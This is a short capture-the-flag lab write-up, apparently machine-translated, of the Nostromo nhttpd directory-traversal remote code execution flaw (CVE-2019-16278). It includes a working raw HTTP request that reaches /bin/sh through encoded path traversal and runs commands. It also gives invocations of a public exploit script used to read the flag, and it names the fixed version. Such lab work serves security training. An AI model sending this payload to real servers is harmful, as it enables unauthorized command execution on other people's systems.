Vulnerability introduction
Nostromo nhttpd is an open source web server. Nostromo has defects in verifying URL security, resulting in directory traversal. Anyone can traverse any file in the system. Therefore, a remote unauthenticated attacker can force the server to point to a shell file such as / bin / sh, thereby executing arbitrary commands.
Impact version
nhttpd:version <= 1.9.6
Problem solving process
1. Launch range environment
2. Burp suite packet capture verification POC
POC
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25
echo
echo
ifconfig 2>&1
3. Script utilization
Script address:https://github.com/jas502n/CVE-2019-16278
./CVE-2019-16278. SH IP address port ID
After successful use, you can also test other commands. I won’t waste time here. I can finally get the flag command directly. Other commands can be understood by myself.
Friends who have worked in the vulfocus shooting range before know that the flag is in the / tmp directory, so let’s go directly to the TMP directory to find the flag.
./CVE-2019-16278. SH IP address port number "CD / tmp&&ls"
Successfully obtained flag
Solution
Upgrade to the latest version 1.9.7